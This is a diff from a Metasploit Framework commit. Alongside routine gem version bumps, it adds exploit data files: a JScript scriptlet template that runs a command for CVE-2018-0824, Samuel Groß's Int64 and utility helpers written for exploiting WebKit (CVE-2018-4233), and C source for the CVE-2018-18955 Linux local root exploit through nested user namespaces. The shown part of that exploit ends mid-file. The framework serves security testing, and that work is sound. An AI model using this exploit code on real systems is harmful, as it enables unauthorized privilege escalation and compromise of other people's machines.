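       rubyntlm
       windows_error
@@ -330,19 +341,18 @@ GEM
     sqlite3 (1.3.13)
     sshkey (1.9.0)
     swagger-blocks (2.0.2)
-    sysrandom (1.0.5)
     thin (1.7.2)
       daemons (~> 1.0, >= 1.0.9)
       eventmachine (~> 1.0, >= 1.0.4)
       rack (>= 1, < 3)
-    thor (0.20.0)
+    thor (0.20.3)
     thread_safe (0.3.6)
-    tilt (2.0.8)
+    tilt (2.0.9)
     timecop (0.9.1)
     ttfunk (1.5.1)
     tzinfo (1.2.5)
       thread_safe (~> 0.1)
-    tzinfo-data (1.2018.5)
+    tzinfo-data (1.2018.9)
       tzinfo (>= 1.0.0)
     warden (1.2.7)
       rack (>= 1.0)
@@ -351,7 +361,7 @@ GEM
       activemodel (>= 4.2.7)
       activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    yard (0.9.16)
+    yard (0.9.18)
 
 PLATFORMS
   ruby
@@ -367,9 +377,10 @@ DEPENDENCIES
   rspec-rails
   rspec-rerun
   simplecov
+  sqlite3 (~> 1.3.0)
   swagger-blocks
   timecop
   yard
 
 BUNDLED WITH
-   1.16.4
+   1.17.3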

+ 1
- 5
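--- a/LICENSE
+++ b/LICENSE
@@ -71,10 +71,6 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT
 
-Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
-Copyright: 2006-2010 Yoann GUILLOT
-License: LGPL-2.1
-
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0
@@ -115,7 +111,7 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT
 
-Files: lib/msf/core/db_manager/http/public/*, lib/msf/core/db_manager/http/views/api_docs.erb
+Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
 Copyright: Copyright 2018 SmartBear Software
 License: Apache 2.0
 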

+ 74
- 73
LICENSE_GEMS View File

@@ -1,135 +1,136 @@
1 1
 This file is auto-generated by tools/dev/update_gem_licenses.sh
2 2
 Ascii85, 1.0.3, MIT
3
-actionpack, 4.2.10, MIT
4
-actionview, 4.2.10, MIT
5
-activemodel, 4.2.10, MIT
6
-activerecord, 4.2.10, MIT
7
-activesupport, 4.2.10, MIT
3
+actionpack, 4.2.11, MIT
4
+actionview, 4.2.11, MIT
5
+activemodel, 4.2.11, MIT
6
+activerecord, 4.2.11, MIT
7
+activesupport, 4.2.11, MIT
8 8
 addressable, 2.5.2, "Apache 2.0"
9 9
 afm, 0.2.2, MIT
10 10
 arel, 6.0.4, MIT
11
-arel-helpers, 2.6.1, MIT
12
-backports, 3.11.1, MIT
13
-bcrypt, 3.1.11, MIT
11
+arel-helpers, 2.8.0, MIT
12
+backports, 3.11.4, MIT
13
+bcrypt, 3.1.12, MIT
14 14
 bcrypt_pbkdf, 1.0.0, MIT
15
-bindata, 2.4.3, ruby
15
+bindata, 2.4.4, ruby
16 16
 bit-struct, 0.16, ruby
17 17
 builder, 3.2.3, MIT
18
-bundler, 1.16.1, MIT
18
+bundler, 1.17.3, MIT
19 19
 coderay, 1.1.2, MIT
20 20
 concurrent-ruby, 1.0.5, MIT
21
-crass, 1.0.3, MIT
21
+cookiejar, 0.3.3, unknown
22
+crass, 1.0.4, MIT
23
+daemons, 1.3.1, MIT
22 24
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
23
-dnsruby, 1.60.2, "Apache 2.0"
24
-docile, 1.3.0, MIT
25
+dnsruby, 1.61.2, "Apache 2.0"
26
+docile, 1.3.1, MIT
27
+ed25519, 1.2.4, MIT
28
+em-http-request, 1.1.5, MIT
29
+em-socksify, 0.3.2, MIT
25 30
 erubis, 2.7.0, MIT
26
-factory_bot, 4.8.2, MIT
27
-factory_bot_rails, 4.8.2, MIT
28
-faker, 1.8.7, MIT
29
-faraday, 0.14.0, MIT
30
-filesize, 0.1.1, MIT
31
-fivemat, 1.3.6, MIT
32
-google-protobuf, 3.5.1, "New BSD"
33
-googleapis-common-protos-types, 1.0.1, "Apache 2.0"
34
-googleauth, 0.6.2, "Apache 2.0"
35
-grpc, 1.8.3, "Apache 2.0"
31
+eventmachine, 1.2.7, "ruby, GPL-2.0"
32
+factory_bot, 5.0.0, MIT
33
+factory_bot_rails, 5.0.0, MIT
34
+faker, 1.9.1, MIT
35
+faraday, 0.15.4, MIT
36
+filesize, 0.2.0, MIT
37
+fivemat, 1.3.7, MIT
36 38
 hashery, 2.1.2, "Simplified BSD"
39
+http_parser.rb, 0.6.0, MIT
37 40
 i18n, 0.9.5, MIT
38 41
 jsobfu, 0.4.2, "New BSD"
39 42
 json, 2.1.0, ruby
40
-jwt, 2.1.0, MIT
41
-little-plugger, 1.1.4, MIT
42
-logging, 2.2.2, MIT
43
-loofah, 2.2.0, MIT
44
-memoist, 0.16.0, MIT
43
+loofah, 2.2.3, MIT
45 44
 metasm, 1.0.3, LGPL
46
-metasploit-aggregator, 1.0.0, "New BSD"
47 45
 metasploit-concern, 2.0.5, "New BSD"
48
-metasploit-credential, 2.0.13, "New BSD"
49
-metasploit-framework, 5.0.0, "New BSD"
46
+metasploit-credential, 3.0.2, "New BSD"
47
+metasploit-framework, 5.0.5, "New BSD"
50 48
 metasploit-model, 2.0.4, "New BSD"
51
-metasploit-payloads, 1.3.31, "3-clause (or ""modified"") BSD"
52
-metasploit_data_models, 2.0.16, "New BSD"
53
-metasploit_payloads-mettle, 0.3.7, "3-clause (or ""modified"") BSD"
54
-method_source, 0.9.0, MIT
55
-mini_portile2, 2.3.0, MIT
49
+metasploit-payloads, 1.3.58, "3-clause (or ""modified"") BSD"
50
+metasploit_data_models, 3.0.4, "New BSD"
51
+metasploit_payloads-mettle, 0.5.4, "3-clause (or ""modified"") BSD"
52
+method_source, 0.9.2, MIT
53
+mini_portile2, 2.4.0, MIT
56 54
 minitest, 5.11.3, MIT
57 55
 mqtt, 0.5.0, MIT
58
-msgpack, 1.2.4, "Apache 2.0"
59
-multi_json, 1.13.1, MIT
56
+msgpack, 1.2.6, "Apache 2.0"
60 57
 multipart-post, 2.0.0, MIT
61 58
 nessus_rest, 0.1.6, MIT
62
-net-ssh, 4.2.0, MIT
59
+net-ssh, 5.1.0, MIT
63 60
 network_interface, 0.0.2, MIT
64
-nexpose, 7.2.0, BSD
65
-nokogiri, 1.8.2, MIT
66
-octokit, 4.8.0, MIT
67
-openssl-ccm, 1.2.1, MIT
61
+nexpose, 7.2.1, "New BSD"
62
+nokogiri, 1.10.1, MIT
63
+octokit, 4.13.0, MIT
64
+openssl-ccm, 1.2.2, MIT
68 65
 openvas-omp, 0.0.4, MIT
69
-os, 0.9.6, MIT
70 66
 packetfu, 1.1.13, BSD
71 67
 patch_finder, 1.0.2, "New BSD"
72
-pcaprub, 0.12.4, LGPL-2.1
73
-pdf-reader, 2.1.0, MIT
68
+pcaprub, 0.13.0, LGPL-2.1
69
+pdf-reader, 2.2.0, MIT
74 70
 pg, 0.20.0, "New BSD"
75 71
 pg_array_parser, 0.0.9, unknown
76
-postgres_ext, 3.0.0, MIT
77
-pry, 0.11.3, MIT
78
-public_suffix, 3.0.2, MIT
79
-rack, 1.6.9, MIT
72
+postgres_ext, 3.0.1, MIT
73
+pry, 0.12.2, MIT
74
+public_suffix, 3.0.3, MIT
75
+rack, 1.6.11, MIT
76
+rack-protection, 1.5.5, MIT
80 77
 rack-test, 0.6.3, MIT
81 78
 rails-deprecated_sanitizer, 1.0.3, MIT
82 79
 rails-dom-testing, 1.0.9, MIT
83
-rails-html-sanitizer, 1.0.3, MIT
84
-railties, 4.2.10, MIT
85
-rake, 12.3.0, MIT
80
+rails-html-sanitizer, 1.0.4, MIT
81
+railties, 4.2.11, MIT
82
+rake, 12.3.2, MIT
86 83
 rb-readline, 0.5.5, BSD
87
-recog, 2.1.18, unknown
84
+recog, 2.1.45, unknown
88 85
 redcarpet, 3.4.0, MIT
89 86
 rex-arch, 0.1.13, "New BSD"
90
-rex-bin_tools, 0.1.4, "New BSD"
87
+rex-bin_tools, 0.1.6, "New BSD"
91 88
 rex-core, 0.1.13, "New BSD"
92 89
 rex-encoder, 0.1.4, "New BSD"
93
-rex-exploitation, 0.1.17, "New BSD"
90
+rex-exploitation, 0.1.20, "New BSD"
94 91
 rex-java, 0.1.5, "New BSD"
95 92
 rex-mime, 0.1.5, "New BSD"
96 93
 rex-nop, 0.1.1, "New BSD"
97 94
 rex-ole, 0.1.6, "New BSD"
98
-rex-powershell, 0.1.77, "New BSD"
95
+rex-powershell, 0.1.79, "New BSD"
99 96
 rex-random_identifier, 0.1.4, "New BSD"
100 97
 rex-registry, 0.1.3, "New BSD"
101 98
 rex-rop_builder, 0.1.3, "New BSD"
102
-rex-socket, 0.1.10, "New BSD"
99
+rex-socket, 0.1.15, "New BSD"
103 100
 rex-sslscan, 0.1.5, "New BSD"
104 101
 rex-struct2, 0.1.2, "New BSD"
105
-rex-text, 0.2.17, "New BSD"
102
+rex-text, 0.2.21, "New BSD"
106 103
 rex-zip, 0.1.3, "New BSD"
107 104
 rkelly-remix, 0.0.7, MIT
108
-rspec, 3.7.0, MIT
109
-rspec-core, 3.7.1, MIT
110
-rspec-expectations, 3.7.0, MIT
111
-rspec-mocks, 3.7.0, MIT
112
-rspec-rails, 3.7.2, MIT
105
+rspec, 3.8.0, MIT
106
+rspec-core, 3.8.0, MIT
107
+rspec-expectations, 3.8.2, MIT
108
+rspec-mocks, 3.8.0, MIT
109
+rspec-rails, 3.8.2, MIT
113 110
 rspec-rerun, 1.1.0, MIT
114
-rspec-support, 3.7.1, MIT
115
-ruby-macho, 1.1.0, MIT
111
+rspec-support, 3.8.0, MIT
112
+ruby-macho, 2.1.0, MIT
116 113
 ruby-rc4, 0.1.5, MIT
117
-ruby_smb, 0.0.23, "New BSD"
114
+ruby_smb, 1.0.5, "New BSD"
118 115
 rubyntlm, 0.6.2, MIT
119
-rubyzip, 1.2.1, "Simplified BSD"
116
+rubyzip, 1.2.2, "Simplified BSD"
120 117
 sawyer, 0.8.1, MIT
121
-signet, 0.8.1, "Apache 2.0"
122
-simplecov, 0.16.0, MIT
118
+simplecov, 0.16.1, MIT
123 119
 simplecov-html, 0.10.2, MIT
120
+sinatra, 1.4.8, MIT
124 121
 sqlite3, 1.3.13, "New BSD"
125 122
 sshkey, 1.9.0, MIT
126
-thor, 0.20.0, MIT
123
+swagger-blocks, 2.0.2, MIT
124
+thin, 1.7.2, "GPLv2+, Ruby 1.8"
125
+thor, 0.20.3, MIT
127 126
 thread_safe, 0.3.6, "Apache 2.0"
127
+tilt, 2.0.9, MIT
128 128
 timecop, 0.9.1, MIT
129 129
 ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
130 130
 tzinfo, 1.2.5, MIT
131
-tzinfo-data, 1.2018.3, MIT
131
+tzinfo-data, 1.2018.9, MIT
132
+warden, 1.2.7, MIT
132 133
 windows_error, 0.1.2, BSD
133 134
 xdr, 2.0.0, "Apache 2.0"
134 135
 xmlrpc, 0.3.0, ruby
135
-yard, 0.9.12, MIT
136
+yard, 0.9.18, MIT

+ 1
- 1
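--- a/config/database.yml.travis
+++ b/config/database.yml.travis
@@ -14,7 +14,7 @@ development: &pgsql
   adapter: postgresql
   database: metasploit_framework_development
   username: postgres
-  pool: 5
+  pool: 25
   timeout: 5
 
 # Warning: The database defined as "test" will be erased and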

+ 0
- 11
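--- a/data/cpuinfo/build.sh
+++ b/data/cpuinfo/build.sh
@@ -1,11 +0,0 @@
-#!/bin/sh
-
-gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
-strip cpuinfo.ia32.bin && \
-gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
-strip cpuinfo.ia64.bin && \
-i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
-strip cpuinfo.exe
-
-ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
-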

+ 0
- 64
data/cpuinfo/cpuinfo.c View File

@@ -1,64 +0,0 @@
1
-// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
2
-
3
-/*
4
-#!/usr/bin/env ruby
5
-#    This file is part of Metasm, the Ruby assembly manipulation suite
6
-#    Copyright (C) 2006-2009 Yoann GUILLOT
7
-#
8
-#    Licence is LGPL, see LICENCE in the top-level directory
9
-
10
-
11
-#
12
-# this sample shows the compilation of a slightly more complex program
13
-# it displays in a messagebox the result of CPUID
14
-#
15
-
16
-*/
17
-
18
-#include <unistd.h>
19
-#include <stdio.h>
20
-
21
-static char *featureinfo[32] = {
22
-	"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
23
-	"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
24
-	"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
25
-	"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
26
-}, *extendinfo[32] = {
27
-	"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
28
-	"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
29
-	"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
30
-	"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
31
-};
32
-
33
-#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
34
-#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
35
-int main(void)
36
-{
37
-
38
-	unsigned long eax, ebx, ecx, edx;
39
-	unsigned long i;
40
-
41
-	cpuid(0);
42
-	fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
43
-
44
-	cpuid(1);
45
-	fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
46
-			b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
47
-	fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
48
-			b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
49
-
50
-	fprintf(stdout, "FLAGS:");
51
-	for (i=0 ; i<32 ; i++)
52
-		if (edx & (1 << i))
53
-			fprintf(stdout, " %s", featureinfo[i]);
54
-
55
-	for (i=0 ; i<32 ; i++)
56
-		if (ecx & (1 << i))
57
-			fprintf(stdout, " %s", extendinfo[i]);
58
-
59
-	fprintf(stdout, "\n");
60
-	fflush(stdout);
61
-
62
-	return 0;
63
-}
64
-

BIN
data/cpuinfo/cpuinfo.exe View File


BIN
data/cpuinfo/cpuinfo.ia32.bin View File


BIN
data/cpuinfo/cpuinfo.ia64.bin View File


BIN
data/exploits/CVE-2012-6636/armeabi/libndkstager.so View File


BIN
data/exploits/CVE-2012-6636/mips/libndkstager.so View File


BIN
data/exploits/CVE-2012-6636/x86/libndkstager.so View File


BIN
data/exploits/CVE-2016-4557/suidhelper View File


BIN
data/exploits/CVE-2018-0824/UnmarshalPwn.exe View File


+ 16
- 0
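--- a/data/exploits/CVE-2018-0824/script_template
+++ b/data/exploits/CVE-2018-0824/script_template
@@ -0,0 +1,16 @@
+<?xml version='1.0'?>
+<package>
+<component id='giffile'>
+<registration
+	description='Dummy'
+	progid='giffile'
+	version='1.00'
+	remotable='True'>
+</registration>
+<script language='JScript'>
+<![CDATA[
+	var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND");
+]]>
+</script>
+</component>
+</package>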

+ 182
- 0
data/exploits/CVE-2018-4233/int64.js View File

@@ -0,0 +1,182 @@
1
+//
2
+// Tiny module that provides big (64bit) integers.
3
+//
4
+// Copyright (c) 2016 Samuel Groß
5
+//
6
+// Requires utils.js
7
+//
8
+
9
+// Datatype to represent 64-bit integers.
10
+//
11
+// Internally, the integer is stored as a Uint8Array in little endian byte order.
12
+function Int64(v) {
13
+    // The underlying byte array.
14
+    var bytes = new Uint8Array(8);
15
+
16
+    switch (typeof v) {
17
+        case 'number':
18
+            v = '0x' + Math.floor(v).toString(16);
19
+        case 'string':
20
+            if (v.startsWith('0x'))
21
+                v = v.substr(2);
22
+            if (v.length % 2 == 1)
23
+                v = '0' + v;
24
+
25
+            var bigEndian = unhexlify(v, 8);
26
+            bytes.set(Array.from(bigEndian).reverse());
27
+            break;
28
+        case 'object':
29
+            if (v instanceof Int64) {
30
+                bytes.set(v.bytes());
31
+            } else {
32
+                if (v.length != 8)
33
+                    throw TypeError("Array must have excactly 8 elements.");
34
+                bytes.set(v);
35
+            }
36
+            break;
37
+        case 'undefined':
38
+            break;
39
+        default:
40
+            throw TypeError("Int64 constructor requires an argument.");
41
+    }
42
+
43
+    // Return a double whith the same underlying bit representation.
44
+    this.asDouble = function() {
45
+        // Check for NaN
46
+        if (bytes[7] == 0xff && (bytes[6] == 0xff || bytes[6] == 0xfe))
47
+            throw new RangeError("Integer can not be represented by a double");
48
+
49
+        return Struct.unpack(Struct.float64, bytes);
50
+    };
51
+
52
+    // Return a javascript value with the same underlying bit representation.
53
+    // This is only possible for integers in the range [0x0001000000000000, 0xffff000000000000)
54
+    // due to double conversion constraints.
55
+    this.asJSValue = function() {
56
+        if ((bytes[7] == 0 && bytes[6] == 0) || (bytes[7] == 0xff && bytes[6] == 0xff))
57
+            throw new RangeError("Integer can not be represented by a JSValue");
58
+
59
+        // For NaN-boxing, JSC adds 2^48 to a double value's bit pattern.
60
+        this.assignSub(this, 0x1000000000000);
61
+        var res = Struct.unpack(Struct.float64, bytes);
62
+        this.assignAdd(this, 0x1000000000000);
63
+
64
+        return res;
65
+    };
66
+
67
+    // Return the underlying bytes of this number as array.
68
+    this.bytes = function() {
69
+        return Array.from(bytes);
70
+    };
71
+
72
+    // Return the byte at the given index.
73
+    this.byteAt = function(i) {
74
+        return bytes[i];
75
+    };
76
+
77
+    // Return the value of this number as unsigned hex string.
78
+    this.toString = function() {
79
+        return '0x' + hexlify(Array.from(bytes).reverse());
80
+    };
81
+
82
+    // Basic arithmetic.
83
+    // These functions assign the result of the computation to their 'this' object.
84
+
85
+    // Decorator for Int64 instance operations. Takes care
86
+    // of converting arguments to Int64 instances if required.
87
+    function operation(f, nargs) {
88
+        return function() {
89
+            if (arguments.length != nargs)
90
+                throw Error("Not enough arguments for function " + f.name);
91
+            for (var i = 0; i < arguments.length; i++)
92
+                if (!(arguments[i] instanceof Int64))
93
+                    arguments[i] = new Int64(arguments[i]);
94
+            return f.apply(this, arguments);
95
+        };
96
+    }
97
+
98
+    // this = -n (two's complement)
99
+    this.assignNeg = operation(function neg(n) {
100
+        for (var i = 0; i < 8; i++)
101
+            bytes[i] = ~n.byteAt(i);
102
+
103
+        return this.assignAdd(this, Int64.One);
104
+    }, 1);
105
+
106
+    // this = a + b
107
+    this.assignAdd = operation(function add(a, b) {
108
+        var carry = 0;
109
+        for (var i = 0; i < 8; i++) {
110
+            var cur = a.byteAt(i) + b.byteAt(i) + carry;
111
+            carry = cur > 0xff | 0;
112
+            bytes[i] = cur;
113
+        }
114
+        return this;
115
+    }, 2);
116
+
117
+    // this = a - b
118
+    this.assignSub = operation(function sub(a, b) {
119
+        var carry = 0;
120
+        for (var i = 0; i < 8; i++) {
121
+            var cur = a.byteAt(i) - b.byteAt(i) - carry;
122
+            carry = cur < 0 | 0;
123
+            bytes[i] = cur;
124
+        }
125
+        return this;
126
+    }, 2);
127
+
128
+    // this = a ^ b
129
+    this.assignXor = operation(function sub(a, b) {
130
+        for (var i = 0; i < 8; i++) {
131
+            bytes[i] = a.byteAt(i) ^ b.byteAt(i);
132
+        }
133
+        return this;
134
+    }, 2);
135
+
136
+    // this = a & b
137
+    this.assignAnd = operation(function sub(a, b) {
138
+        for (var i = 0; i < 8; i++) {
139
+            bytes[i] = a.byteAt(i) & b.byteAt(i);
140
+        }
141
+        return this;
142
+    }, 2)
143
+}
144
+
145
+// Constructs a new Int64 instance with the same bit representation as the provided double.
146
+Int64.fromDouble = function(d) {
147
+    var bytes = Struct.pack(Struct.float64, d);
148
+    return new Int64(bytes);
149
+};
150
+
151
+// Convenience functions. These allocate a new Int64 to hold the result.
152
+
153
+// Return -n (two's complement)
154
+function Neg(n) {
155
+    return (new Int64()).assignNeg(n);
156
+}
157
+
158
+// Return a + b
159
+function Add(a, b) {
160
+    return (new Int64()).assignAdd(a, b);
161
+}
162
+
163
+// Return a - b
164
+function Sub(a, b) {
165
+    return (new Int64()).assignSub(a, b);
166
+}
167
+
168
+// Return a ^ b
169
+function Xor(a, b) {
170
+    return (new Int64()).assignXor(a, b);
171
+}
172
+
173
+// Return a & b
174
+function And(a, b) {
175
+    return (new Int64()).assignAnd(a, b);
176
+}
177
+
178
+// Some commonly used numbers.
179
+Int64.Zero = new Int64(0);
180
+Int64.One = new Int64(1);
181
+
182
+// That's all the arithmetic we need for exploiting WebKit.. :)

BIN
data/exploits/CVE-2018-4233/stage1.bin View File


+ 78
- 0
data/exploits/CVE-2018-4233/utils.js View File

@@ -0,0 +1,78 @@
1
+//
2
+// Utility functions.
3
+//
4
+// Copyright (c) 2016 Samuel Groß
5
+//
6
+
7
+// Return the hexadecimal representation of the given byte.
8
+function hex(b) {
9
+    return ('0' + b.toString(16)).substr(-2);
10
+}
11
+
12
+// Return the hexadecimal representation of the given byte array.
13
+function hexlify(bytes) {
14
+    var res = [];
15
+    for (var i = 0; i < bytes.length; i++)
16
+        res.push(hex(bytes[i]));
17
+
18
+    return res.join('');
19
+}
20
+
21
+// Return the binary data represented by the given hexdecimal string.
22
+function unhexlify(hexstr) {
23
+    if (hexstr.length % 2 == 1)
24
+        throw new TypeError("Invalid hex string");
25
+
26
+    var bytes = new Uint8Array(hexstr.length / 2);
27
+    for (var i = 0; i < hexstr.length; i += 2)
28
+        bytes[i/2] = parseInt(hexstr.substr(i, 2), 16);
29
+
30
+    return bytes;
31
+}
32
+
33
+function hexdump(data) {
34
+    if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
35
+        data = Array.from(data);
36
+
37
+    var lines = [];
38
+    for (var i = 0; i < data.length; i += 16) {
39
+        var chunk = data.slice(i, i+16);
40
+        var parts = chunk.map(hex);
41
+        if (parts.length > 8)
42
+            parts.splice(8, 0, ' ');
43
+        lines.push(parts.join(' '));
44
+    }
45
+
46
+    return lines.join('\n');
47
+}
48
+
49
+// Simplified version of the similarly named python module.
50
+var Struct = (function() {
51
+    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
52
+    var buffer      = new ArrayBuffer(8);
53
+    var byteView    = new Uint8Array(buffer);
54
+    var uint32View  = new Uint32Array(buffer);
55
+    var float64View = new Float64Array(buffer);
56
+
57
+    return {
58
+        pack: function(type, value) {
59
+            var view = type;        // See below
60
+            view[0] = value;
61
+            return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT);
62
+        },
63
+
64
+        unpack: function(type, bytes) {
65
+            if (bytes.length !== type.BYTES_PER_ELEMENT)
66
+                throw Error("Invalid bytearray");
67
+
68
+            var view = type;        // See below
69
+            byteView.set(bytes);
70
+            return view[0];
71
+        },
72
+
73
+        // Available types.
74
+        int8:    byteView,
75
+        int32:   uint32View,
76
+        float64: float64View
77
+    };
78
+})();

BIN
data/exploits/CVE-2018-4237/ssudo View File


BIN
data/exploits/CVE-2018-4404/stage2.dylib View File


BIN
data/exploits/CVE-2018-8120/CVE-2018-8120x64.exe View File


BIN
data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe View File


+ 52
- 0
data/exploits/cve-2018-18955/subshell.c View File

@@ -0,0 +1,52 @@
1
+// subshell.c
2
+// author: Jann Horn
3
+// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
4
+
5
+#define _GNU_SOURCE
6
+#include <unistd.h>
7
+#include <grp.h>
8
+#include <err.h>
9
+#include <stdio.h>
10
+#include <fcntl.h>
11
+#include <sys/socket.h>
12
+#include <sys/un.h>
13
+#include <sched.h>
14
+#include <sys/wait.h>
15
+
16
+int main() {
17
+  int sync_pipe[2];
18
+  char dummy;
19
+  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe");
20
+
21
+  pid_t child = fork();
22
+  if (child == -1) err(1, "fork");
23
+  if (child == 0) {
24
+    close(sync_pipe[1]);
25
+    if (unshare(CLONE_NEWUSER)) err(1, "unshare userns");
26
+    if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock");
27
+
28
+    if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock");
29
+    execl("/bin/bash", "bash", NULL);
30
+    err(1, "exec");
31
+  }
32
+
33
+  close(sync_pipe[0]);
34
+  if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock");
35
+  char pbuf[100];
36
+  sprintf(pbuf, "/proc/%d", (int)child);
37
+  if (chdir(pbuf)) err(1, "chdir");
38
+  const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n";
39
+  int uid_map = open("uid_map", O_WRONLY);
40
+  if (uid_map == -1) err(1, "open uid map");
41
+  if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map");
42
+  close(uid_map);
43
+  int gid_map = open("gid_map", O_WRONLY);
44
+  if (gid_map == -1) err(1, "open gid map");
45
+  if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map");
46
+  close(gid_map);
47
+  if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock");
48
+
49
+  int status;
50
+  if (wait(&status) != child) err(1, "wait");
51
+  return 0;
52
+}

BIN
data/exploits/cve-2018-18955/subshell.out View File


+ 272
- 0
data/exploits/cve-2018-18955/subuid_shell.c View File

@@ -0,0 +1,272 @@
1
+// subuid_shell.c - Linux local root exploit for CVE-2018-18955
2
+// Exploits broken uid/gid mapping in nested user namespaces.
3
+// ---
4
+// Mostly stolen from Jann Horn's exploit:
5
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
6
+// Some code stolen from Xairy's exploits:
7
+// - https://github.com/xairy/kernel-exploits
8
+// ---
9
+// <bcoles@gmail.com>
10
+// - added auto subordinate id mapping
11
+// https://github.com/bcoles/kernel-exploits/tree/cve-2018-18955
12
+
13
+#define _GNU_SOURCE
14
+
15
+#include <unistd.h>
16
+#include <fcntl.h>
17
+#include <grp.h>
18
+#include <pwd.h>
19
+#include <sched.h>
20
+#include <stdio.h>
21
+#include <sys/socket.h>
22
+#include <sys/un.h>
23
+#include <sys/wait.h>
24
+#include <stdarg.h>
25
+#include <stdlib.h>
26
+#include <string.h>
27
+#include <signal.h>
28
+#include <sys/prctl.h>
29
+
30
+#define DEBUG
31
+
32
+#ifdef DEBUG
33
+#  define dprintf printf
34
+#else
35
+#  define dprintf
36
+#endif
37
+
38
+char* SUBSHELL = "./subshell";
39
+
40
+
41
+// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * *
42
+
43
+#define CHUNK_SIZE 1024
44
+
45
+int read_file(const char* file, char* buffer, int max_length) {
46
+  int f = open(file, O_RDONLY);
47
+  if (f == -1)
48
+    return -1;
49
+  int bytes_read = 0;
50
+  while (1) {
51
+    int bytes_to_read = CHUNK_SIZE;
52
+    if (bytes_to_read > max_length - bytes_read)
53
+      bytes_to_read = max_length - bytes_read;
54
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
55
+    if (rv == -1)
56
+      return -1;
57
+    bytes_read += rv;
58
+    if (rv == 0)
59
+      return bytes_read;
60
+  }
61
+}
62
+
63
+static int write_file(const char* file, const char* what, ...) {
64
+  char buf[1024];
65
+  va_list args;
66
+  va_start(args, what);
67
+  vsnprintf(buf, sizeof(buf), what, args);
68
+  va_end(args);
69
+  buf[sizeof(buf) - 1] = 0;
70
+  int len = strlen(buf);
71
+
72
+  int fd = open(file, O_WRONLY | O_CLOEXEC);
73
+  if (fd == -1)
74
+    return -1;
75
+  if (write(fd, buf, len) != len) {
76
+    close(fd);
77
+    return -1;
78
+  }
79
+  close(fd);
80
+  return 0;
81
+}
82
+
83
+
84
+// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * *
85
+
86
+int get_subuid(char* output, int max_length) {
87
+  char buffer[1024];
88
+  char* path = "/etc/subuid";
89
+  int length = read_file(path, &buffer[0], sizeof(buffer));
90
+  if (length == -1)
91
+    return -1;
92
+
93
+  int real_uid = getuid();
94
+  struct passwd *u = getpwuid(real_uid);
95
+
96
+  char needle[1024];
97
+  sprintf(needle, "%s:", u->pw_name);
98
+  int needle_length = strlen(needle);
99
+  char* found = memmem(&buffer[0], length, needle, needle_length);
100
+  if (found == NULL)
101
+    return -1;
102
+
103
+  int i;
104
+  for (i = 0; found[needle_length + i] != ':'; i++) {
105
+    if (i >= max_length)
106
+      return -1;
107
+    if ((found - &buffer[0]) + needle_length + i >= length)
108
+      return -1;
109
+    output[i] = found[needle_length + i];
110
+  }
111
+
112
+  return 0;
113
+}
114
+
115
+int get_subgid(char* output, int max_length) {
116
+  char buffer[1024];
117
+  char* path = "/etc/subgid";
118
+  int length = read_file(path, &buffer[0], sizeof(buffer));
119
+  if (length == -1)
120
+    return -1;
121
+
122
+  int real_gid = getgid();
123
+  struct group *g = getgrgid(real_gid);
124
+
125
+  char needle[1024];
126
+  sprintf(needle, "%s:", g->gr_name);
127
+  int needle_length = strlen(needle);
128
+  char* found = memmem(&buffer[0], length, needle, needle_length);
129
+  if (found == NULL)
130
+    return -1;
